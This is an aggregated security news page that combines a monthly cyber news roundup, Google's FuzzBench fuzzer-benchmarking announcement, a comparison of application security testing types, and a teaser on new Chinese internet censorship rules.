The English FA shut down its investigation into allegations Liverpool employees hacked into Manchester City's scouting system. The Manchester club also made news headlines after UEFA banned it from European competition for two years, a ban based on alleged stolen internal email evidence obtained by a hacker.  Read The Billion Pound Manchester City Hack for further details.

The UK government said GRU (Russian military intelligence) was behind a massive cyber-attack which knocked out more than 2,000 websites in the country of Georgia last year, in "attempt to undermine Georgia's sovereignty". Foreign Secretary Dominic Raab described it as "totally unacceptable".

The United States deputy assistant secretary for cyber and communications, Robert Strayer, said he did not believe the UK government's January 2020 decision to allow Huawei limited access to UK's 5G infrastructure was final. 'Our understanding is that there might have been some initial decisions made but conversations are continuing," he told the BBC. Read The UK Government Huawei Dilemma and the Brexit Factor for more on UK government's Huawei political, economic and security debate.

Following Freedom of Information requests made by Viasat, it reported UK government employees had either lost or stolen 2,004 mobiles and laptops between June 2018 and June 2019.

According to figures by the FBI, cybercriminals netted £2.7bn ($3.5bn) from cyber-crimes report 2019, with phishing and extortion remaining the most common method of scamming people. These FBI reported cybercrime losses have tripled over the past 5 years. The FBI concluded that cyber scam techniques are becoming more sophisticated, making it harder for original people to tell "real from fake".  A new Kaspersky report backs up the FBI, finding a 9.5% growth in financial phishing during the final quarter of 2019.

The Labour party is facing data protection fines of up £15m for failing to protect their members' personal data. The Information Commissioner's Office confirmed the Labour Party would be the focus of their investigation since it is legally responsible for securing members' information as the "data controller".

This month's cloud misconfiguration breach award goes to french sports retail giant Decathlon, after 123 million customer records were found to be exposed by researchers at vpnMentor .  Leaked data included employee usernames, unencrypted passwords and personally identifiable information (PII) including social security numbers, full names, addresses, mobile phone numbers, addresses and birth dates. “The leaked Decathlon Spain database contains a veritable treasure trove of employee data and more. It has everything that a malicious hacker would, in theory, need to use to take over accounts and gain access to private and even proprietary information,” said vpnMentor.

If you have a 'Ring' smart camera doorbell (IoT) device then may have noticed Two-Factor Authentication (2FA) was mandated in February.  Ring's stance of enforcing a strengthening of security may be related to several recent high-profile home camera hack reports.
Ring: An IoT device's security improved by mandated 2FA

The facial recognition company Clearview AI advised a hacker stole its client list database. The firm works with law enforcement agencies and gained notoriety after admitting it had scrapped billions of individuals photos off the internet.

BLOG
NEWS
VULNERABILITIES AND SECURITY UPDATESAWARENESS, EDUCATION AND THREAT INTELLIGENCE

FuzzBench: Fuzzer Benchmarking as a Service


We are excited to launch FuzzBench, a fully automated, open source, free service for evaluating fuzzers. The goal of FuzzBench is to make it painless to rigorously evaluate fuzzing research and make fuzzing research easier for the community to adopt.
Fuzzing is an important bug finding technique. At Google, we’ve found tens of thousands of bugs (1, 2) with fuzzers like libFuzzer and AFL. There are numerous research papers that either improve upon these tools (e.g. MOpt-AFL, AFLFast, etc) or introduce new techniques (e.g. Driller, QSYM, etc) for bug finding. However, it is hard to know how well these new tools and techniques generalize on a large set of real world programs. Though research normally includes evaluations, these often have shortcomings—they don't use a large and diverse set of real world benchmarks, use few trials, use short trials, or lack statistical tests to illustrate if findings are significant. This is understandable since full scale experiments can be prohibitively expensive for researchers. For example, a 24-hour, 10-trial, 10 fuzzer, 20 benchmark experiment would require 2,000 CPUs to complete in a day.
To help solve these issues the OSS-Fuzz team is launching FuzzBench, a fully automated, open source, free service. FuzzBench provides a framework for painlessly evaluating fuzzers in a reproducible way. To use FuzzBench, researchers can simply integrate a fuzzer and FuzzBench will run an experiment for 24 hours with many trials and real world benchmarks. Based on data from this experiment, FuzzBench will produce a report comparing the performance of the fuzzer to others and give insights into the strengths and weaknesses of each fuzzer. This should allow researchers to focus more of their time on perfecting techniques and less time setting up evaluations and dealing with existing fuzzers.
Integrating a fuzzer with FuzzBench is simple as most integrations are less than 50 lines of code (example). Once a fuzzer is integrated, it can fuzz almost all 250+ OSS-Fuzz projects out of the box. We have already integrated ten fuzzers, including AFL, LibFuzzer, Honggfuzz, and several academic projects such as QSYM and Eclipser.
Reports include statistical tests to give an idea how likely it is that performance differences between fuzzers are simply due to chance, as well as the raw data so researchers can do their own analysis. Performance is determined by the amount of covered program edges, though we plan on adding crashes as a performance metric. You can view a sample report here.
How to Participate
Our goal is to develop FuzzBench with community contributions and input so that it becomes the gold standard for fuzzer evaluation. We invite members of the fuzzing research community to contribute their fuzzers and techniques, even while they are in development. Better evaluations will lead to more adoption and greater impact for fuzzing research.
We also encourage contributions of better ideas and techniques for evaluating fuzzers. Though we have made some progress on this problem, we have not solved it and we need the community’s help in developing these best practices.
Please join us by contributing to the FuzzBench repo on GitHub.

Weighing Pros and Cons to Select AppSec Testing Types

When determining the right testing types for your application security (AppSec) program, there are several questions that likely come to mind: What is the difference between the various AppSec tests? What vulnerabilities do the tests uncover? How many testing types do I need to include in my program?

You can answer these questions and form the appropriate mix of security tests for your organization by understanding the capabilities of each assessment.

Consider the pros and cons list below. The list establishes the main function of each security test, then outlines their strengths and weaknesses.

Static Application Security Testing (SAST)

SAST analyzes application code for security vulnerabilities. ツ?

Pro: SAST can be integrated into the development pipeline, allowing scans to happen automatically ??? making it a good fit for DevSecOps. SAST also works on any type of application (web, desktop, mobile, etc.) and covers a broad range of programming languages.

Cons: SAST is unable to find business logic flaws or accurately pinpoint vulnerabilities in third-party components.

Dynamic Application Security Testing (DAST)

DAST analyzes web applications by actively exploiting them at runtime.

Pros: DAST is a commonly used security test because it can run a scan without access to source code, which is a huge win if the development team is not willing to share their code. Additionally, DAST finds flaws and server misconfigurations with high accuracy and is largely independent of programming language.

Cons: DAST only scans web applications, and it cannot find business logic flaws. Running a dynamic scan is also time consuming, so you will want to run the scan overnight.

Software Composition Analysis (SCA)

SCA looks at open source, third-party libraries, for vulnerabilities in all types of applications.

Pros: Integrating SCA into the software delivery lifecycle is simple, and the scans are quick. It is easy to remediate vulnerabilities in open source code by upgrading to a newer component version. SCA is non-threatening to development teams because it is not their code being analyzed.

Cons: You can only find vulnerabilities in third-party components. You cannot find business-logic flaws.

Interactive Application Security Testing (IAST)

IAST hooks an agent into the application or runtime environment.

Pros: The results are fast and accurate, making it suitable for DevSecOps. ツ?

Cons: IAST does not cover every flaw type, like Cross-Site Scripting, because IAST only looks inside the application. Also, since IAST is a newer technology, it only understands major programming languages, and the licenses tend to be expensive.

Penetration Testing

A human tester assesses the architecture, components, and code of the application by simulating an attack.

Pros: Penetration testing uses human ingenuity to find ways around security controls. It finds all forms of security issues, including business logic flaws, in every type of application.

Cons: It is time consuming and expensive, and the results are quickly outdated. Also, since penetration testing is conducted in staging or production, it often creates unplanned work for the development team.

ツ?chart, testing types

After evaluating the various AppSec tests, you have probably noticed that there is not one perfect solution. All of the tests have strengths that could benefit your application, but they also have limitations regarding the specific flaws and vulnerabilities they are able to uncover.

To provide the best protection for your applications, it is important to have a strong mix of assessments. Ideally, you would employ all AppSec tests, but the reality is, most organizations have to choose which tests make the most sense based on their release schedule, risk tolerance, and funds. Once you have testing in place, and your AppSec program is maturing, then you can add more security tests to the mix to further secure you applications.

Learn more about AppSec testing types in our recent guide, AppSec Best Practices vs Practicalities: What to Strive for and Where to Start.

China cracks down on ‘sexual innuendo’ and ‘celebrity gossip’ in new censorship rules

Controls on the ‘online information content ecosystem’ bring heightened concern about freedom of speech

Sweeping new internet censorship rules have gone into effect in China, prompting concerns that authorities will further control information and online debate as the country reels from the coronavirus outbreak.

China’s cybersecurity administration has since Saturday implemented a set of new regulations on the governance of the “online information content ecosystem” that encourage “positive” content while barring material deemed “negative” or illegal.

Related: ‘They’re chasing me’: the journalist who wouldn’t stay quiet on Covid-19

Related: Dramatic fall in China pollution levels ‘partly related’ to coronavirus

Continue reading...